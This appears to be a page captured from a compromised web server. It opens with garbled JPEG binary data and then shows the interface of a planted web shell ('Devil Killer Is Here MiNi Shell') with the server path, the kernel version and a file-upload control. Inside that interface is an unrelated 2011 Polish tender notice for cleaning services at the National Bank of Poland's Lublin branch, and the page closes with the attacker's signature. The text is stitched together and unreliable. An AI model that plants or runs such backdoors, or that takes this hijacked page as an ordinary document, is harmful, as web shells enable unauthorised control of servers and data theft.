JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111229/440722-N-2011.html

<p class="kh_header"><b>Lublin: świadczenie usług codziennego sprzątania pomieszczeń wewnątrz budynku banku oraz posesji Narodowego Banku Polskiego Oddziału Okręgowego w Lublinie</b><br>
<b>Numer ogłoszenia: 440722 - 2011; data zamieszczenia: 29.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Bank Polski Oddział Okręgowy w Lublinie , ul. Chopina 6, 20-026 Lublin, woj. lubelskie, tel. 081 5317612, 5317621.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nbp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług codziennego sprzątania pomieszczeń wewnątrz budynku banku oraz posesji Narodowego Banku Polskiego Oddziału Okręgowego w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonywanie usług kompleksowego sprzątania pomieszczeń i ich wyposażenia w budynku siedzibie Oddziału Okręgowego NBP w Lublinie ul. Chopina 6 oraz sprzątanie, odśnieżanie i usuwanie oblodzeń z terenu posesji, dachów budynków oraz chodników 
i części ulic przyległych do posesji Oddziału, wraz z utrzymaniem terenów zielonych na posesji, tj:
A.	 świadczenie usług codziennego kompleksowego sprzątania: 
1)	pomieszczeń administracyjno-biurowych oraz technicznych i magazynowych o łącznej powierzchni 2.234, 63 m2 wraz z wyposażeniem w  budynku  oddziału banku,
2)	terenu posesji o łącznej powierzchni 1.118,00 m2 wraz z chodnikami i ulicami przyległymi do posesji oddziału, utrzymanie terenów zielonych oraz utrzymanie w czystości frontu budynku tj. czyszczenie odpowiednimi środkami chemicznymi powierzchni zewnętrznych drzwi wejścia głównego do budynku, przeszkleń w drzwiach, parapetów zewnętrznych na poziomie niskiego parteru i krat okiennych od ul. Chopina, usuwanie śniegu z dachów budynków.
B.	wykonywanie okresowych, każdorazowo na oddzielne zlecenie, usług:
1)	mycia okien w całym budynku (obustronnie szyb oraz żaluzji) ,
2)	prania wykładzin dywanowych przymocowanych na stałe do podłoża, 
3)	czyszczenia przy użyciu środków do tego przeznaczonych mosiężnych ozdobnych elementów filarów na sali operacyjnej zlokalizowanej na parterze budynku oddziału banku oraz innych elementów mosiężnych (okuć mebli i poręczy),
C.	zakup i dostawa środków higieniczno - sanitarnych na potrzeby pracowników banku i klientów oraz bieżące wykładanie ich w łazienkach i pokojach socjalnych,
D.	w okresie intensywnych opadów śniegu wywóz spryzmowanego śniegu z posesji oraz przyległych chodników i ulic każdorazowo na zlecenie Zamawiającego.
Szczegółowy opis przedmiotu zamówienia zamieszczono w załącznikach nr 1A, 1B, 1C i 2 do SIWZ.
2.	W czasie trwania dni otwartych NBP oraz nasilonych prac remontowych w Oddziale ww prace porządkowe wykonywane będą przez 7 dni w tygodniu oraz przy zwiększonym składzie osób sprzątających - Zamawiający przewiduje w okresie trwania niniejszej umowy 5 tygodni pracy w wydłużonym do 7 dni czasie oraz zwiększonym składzie osób sprzątających, o czym będzie informował Wykonawcę z wyprzedzeniem. 
3.	Usługi codziennego sprzątania i utrzymania terenu posesji  wykonywane będą przy użyciu  sprzętu i narzędzi Wykonawcy oraz jego środków czyszczących i dezynfekcyjnych pierwszej (najwyższej)  jakości  jak również jego środków do utrzymania i pielęgnacji terenów zielonych. Stosowane przez Wykonawcę środki czystości muszą  posiadać dopuszczenie do stosowania  zgodnie w obowiązującymi przepisami prawa.
4.	Wykonawca wykonywać będzie usługi sprzątania przy zatrudnieniu co najmniej czterech pracowników, w tym trzech w wymiarze trzech pełnych etatów oraz jednego w wymiarze 0,75  etatu.  W ww  liczbie czterech pracowników jest również dozorca. Wykonawca dysponuje ponadto 1 osobą uprawnioną do dozoru osób bezpośrednio zatrudnionych przy pracach porządkowych.
5.	Pracownicy przydzieleni do wykonywania prac porządkowych zobowiązani będą wykonywać swoją pracę w odzieży roboczej, identyfikującej Wykonawcę oraz powinni być wyposażeni w niezbędne środki ochrony indywidualnej.
6.	Prace porządkowe w pomieszczeniach wyszczególnionych poniżej będą prowadzone, przez sprzątaczkę pracującą na rannej zmianie, w obecności  pracowników Zamawiającego.
- pokoje biurowe nr 9, 12, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, pokój na końcu korytarza bez numeru - strona lewa, toaleta  - strona lewa, korytarz za drzwiami wahadłowymi - strona lewa, sala konferencyjna   o łącznej pow. 	279,90 m2
- 3 pokoje na półpiętrze, korytarz  o łącznej pow.-	56,30 m2
7.	Sprzątanie pomieszczeń wewnątrz budynku odbywać się będzie w godz. porannych od 7:30 do 15:30 przez jedną osobę sprzątającą oraz w godzinach popołudniowych od godz. 13:00 do 21:00 przez dwie osoby sprzątające w wymiarze trzech pełnych etatów (w godz. 13:00 - 15:30 przebywają w budynku 3 osoby sprzątające).
8.	Sprzątanie posesji winno odbywać się od godz. 6 rano w wymiarze 6 godzin dziennie, a w zimie w zależności od warunków atmosferycznych, a w szczególności od intensywności opadów śniegu przez 24 godziny na dobę przez pracowników w liczbie zapewniającej dokładne usunięcie śniegu i złożenie w pryzmy oraz oczyszczenie całej powierzchni posesji oraz dachów budynków znajdujących się na posesji Zamawiającego, zgodnie z załącznikiem nr 2 do SIWZ.
9.	Wykonywanie prac porządkowych w innych godzinach niż określone w ust.6 i 7 może być dopuszczone tylko za zgodą Zamawiającego po wcześniejszym uzgodnieniu.
10.	Sprzątanie wewnątrz budynku oraz jego otoczenia w granicach posesji przyległych chodników i połowy szerokości przyległych ulic wykonywane będzie przez Wykonawcę w zakresie niezbędnym dla utrzymania porządku i czystości oraz w zależności od warunków i sytuacji, wynikających z warunków atmosferycznych, a w szczególności usuwania skutków ulewnych deszczy, huraganów, burz, zawiei lub zamieci śnieżnych (zalegające błoto, śnieg, lód, połamane gałęzie i drzewa oraz inne zanieczyszczenia).
11.	Odśnieżanie dachu budynku banku  i garaży będzie przeprowadzane przez osoby posiadające niezbędne w tym zakresie uprawnienia (m. in. do wykonywania pracy na wysokości), których kserokopie potwierdzone za zgodność z oryginałem zostaną przedstawione Zamawiającemu przed wykonaniem ww prac, z użyciem sprzętu zabezpieczającego zapewnionego przez Wykonawcę.
12.	Prace określone w Rozdz. III ust. 1 lit. B wykonywane będą przez Wykonawcę na podstawie pisemnego Zlecenia wykonania usługi, którego wzór stanowi załącznik nr 8 do umowy. Zamawiający zastrzega, że usługi te wykonywane będą w ściśle określonym czasie, aby nie utrudniać funkcjonowania banku, m.in. prace na sali na parterze budynku mogą być wykonywane w dni wolne od pracy (sobota-niedziela) oraz po godz. pracy banku. Terminy oraz częstotliwość wykonywania tych prac została określona w zał. nr 1B do SIWZ. Bieg terminu wykonania tych prac rozpoczyna się od daty wysłania przez Zamawiającego za pomocą faksu bądź drogą elektroniczną pisemnego zlecenia wykonania tych prac. Zamawiający zastrzega sobie możliwość niepełnego wykorzystania przedmiotu zamówienia dla usług wyszczególnionych w zał. nr 1B do SIWZ tj. zlecanie wykonania tych prac tylko w części wybranych przez siebie pomieszczeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia jest wykonywanie usług kompleksowego sprzątania pomieszczeń i ich wyposażenia w budynku siedzibie Oddziału Okręgowego NBP w Lublinie ul. Chopina 6 oraz sprzątanie, odśnieżanie i usuwanie oblodzeń z terenu posesji, dachów budynków oraz chodników i części ulic przyległych do posesji Oddziału, wraz z utrzymaniem terenów zielonych na posesji, tj:
A.	 świadczenie usług codziennego kompleksowego sprzątania: 
1)	pomieszczeń administracyjno-biurowych oraz technicznych i magazynowych o łącznej powierzchni 2.234, 63 m2 wraz z wyposażeniem w  budynku  oddziału banku,
2)	terenu posesji o łącznej powierzchni 1.118,00 m2 wraz z chodnikami i ulicami przyległymi do posesji oddziału, utrzymanie terenów zielonych oraz utrzymanie w czystości frontu budynku tj. czyszczenie odpowiednimi środkami chemicznymi powierzchni zewnętrznych drzwi wejścia głównego do budynku, przeszkleń w drzwiach, parapetów zewnętrznych na poziomie niskiego parteru i krat okiennych od ul. Chopina, usuwanie śniegu z dachów budynków.
B.	wykonywanie okresowych, każdorazowo na oddzielne zlecenie, usług:
1)	mycia okien w całym budynku (obustronnie szyb oraz żaluzji) ,
2)	prania wykładzin dywanowych przymocowanych na stałe do podłoża, 
3)	czyszczenia przy użyciu środków do tego przeznaczonych mosiężnych ozdobnych elementów filarów na sali operacyjnej zlokalizowanej na parterze budynku oddziału banku oraz innych elementów mosiężnych (okuć mebli i poręczy),
C.	zakup i dostawa środków higieniczno - sanitarnych na potrzeby pracowników banku i klientów oraz bieżące wykładanie ich w łazienkach i pokojach socjalnych,
D.	w okresie intensywnych opadów śniegu wywóz spryzmowanego śniegu z posesji oraz przyległych chodników i ulic każdorazowo na zlecenie Zamawiającego.

Szczegółowy opis przedmiotu zamówienia zamieszczono w załącznikach nr 1A, 1B, 1C i 2 do SIWZ.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.13.00-9, 90.91.90.00-2, 77.30.00.00-3, 77.31.41.00-5, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 33.76.10.00-2, 33.76.30.00-6, 33.76.40.00-3, 90.91.91.00-3, 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 23.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje usługi sprzątania, tj. przez okres jednego roku sprzątał pomieszczenia administracyjno-biurowe o powierzchni nie mniejszej niż 2.000 m2 i potwierdzi, że usługi te zostały wykonane prawidłowo</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:
dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia tj. odpowiednim sprzętem, maszynami i narzędziami niezbędnymi do wykonania przedmiotu zamówienia, tj. m. innymi co najmniej dwoma odkurzaczami do odkurzania dużych powierzchni, kosiarką z silnikiem spalinowym oraz odśnieżarką z silnikiem spalinowym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:
dysponuje odpowiednim pod względem kwalifikacji personelem, w tym co najmniej 4 osobami na stanowiskach fizycznych, które będą wykonywać zamówienie, posiadających praktykę w zakresie wykonywania czynności objętych przedmiotem zamówienia oraz co najmniej 1 osobą uprawnioną do dozoru osób bezpośrednio zatrudnionych przy pracach porządkowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy. Przykładowy formularz oświadczenia podany jest w załączniku nr 3 do SIWZ,
2)	jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w części III.4.3.1 ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Termin ważności dokumentów stosuje się odpowiednio.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	kalkulację ceny wykonania przedmiotu zamówienia. Przykładowy formularz kalkulacji podany jest w załączniku nr 10 do SIWZ;
2)	oszacowane przez Wykonawcę ilości środków higienicznych na potrzeby pracowników i klientów Zamawiającego oraz ich ceny (wypełniając zał.nr 1C do SIWZ). 
3)	pełnomocnictwo do podpisywania oferty i jej załączników, o ile prawo do podpisywania ofert nie wynika z innych dokumentów złożonych wraz z ofertą, a w przypadku Wykonawcy będącego przedsiębiorcą prowadzącym działalność gospodarczą na podstawie wpisu do ewidencji działalności gospodarczej - oryginał lub kopia aktualnego odpisu z właściwego rejestru i pełnomocnictwo (gdy ofertę podpisze inna osoba). Pełnomocnictwo do podpisania oferty zostanie złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem notarialnie lub kopii poświadczonej za zgodność z oryginałem przez osobę/ osoby udzielające pełnomocnictwa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nbp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Bank Polski Oddział Okręgowy w Lublinie, ul. Chopina 6, 20-026 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2012 godzina 09:00, miejsce: Narodowy Bank Polski Oddział Okręgowy w Lublinie, ul. Chopina 6, 20-026 Lublin sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com